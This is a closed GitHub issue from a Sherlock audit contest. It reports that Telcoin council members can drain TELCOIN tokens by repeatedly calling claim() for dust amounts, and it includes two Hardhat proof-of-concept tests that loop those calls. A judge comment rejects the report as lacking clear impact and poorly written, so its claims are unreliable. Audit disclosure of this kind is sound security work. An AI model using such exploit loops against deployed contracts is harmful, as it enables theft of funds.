search

sherlock-audit / 2024-01-telcoin-judging

6 stars 5 forks source link

CL001 - TELCOIN can be drained if members claim() dust amount #137

Closed sherlock-admin2 closed 9 months ago

sherlock-admin2 commented 9 months ago

CL001

high

TELCOIN can be drained if members claim() dust amount

Summary

TELCOIN can be drained becauseclaim() mtehod allow the withdrawal of the dust balance

Vulnerability Detail

poc 1

describe("my poc",()=>{
            it("test claim",async ()=>{
                await expect(councilMember.mint(member.address));
                await expect(councilMember.mint(support.address));

              //test poc2
                for (let i=0;i<100;){
                    await expect(councilMember.connect(member).claim(0,0)).to.not.reverted;
                    i++;
                }
                await expect(councilMember.connect(member).claim(0, 5000)).to.not.reverted;

                console.log('memeber telcoin balance:',await telcoin.balanceOf(member.address));
                console.log(await telcoin.balanceOf(await councilMember.getAddress()));
            } )
        })

      my poc
memeber telcoin balance: 5000n
5200n

poc 2

describe("my poc",()=>{
            it("test claim",async ()=>{
                await expect(councilMember.mint(member.address));
                await expect(councilMember.mint(support.address));

                //test poc1
                for (let i=0;i<500;){
                    await expect(councilMember.connect(member).claim(0, 20)).to.not.reverted;
                    i++;
                }

                console.log('memeber telcoin balance:',await telcoin.balanceOf(member.address));
                console.log(await telcoin.balanceOf(await councilMember.getAddress()));
            } )
        })

      my poc
memeber telcoin balance: 10000n
40100n

Impact

Due to council member can get more than their share feel free, leads to TELCOIN can be drained.

Code Snippet

https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L92

https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L267

Tool used

Manual Review

Recommendation

Redesign thecliam() method and _retrieve()mtehod , tracking the amountthat have been claimed by members, or limit the use of _retrieve()mtehod

Duplicate of #23

sherlock-admin2 commented 9 months ago

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid because { there is no clear impact mentioned and the report is poorly written}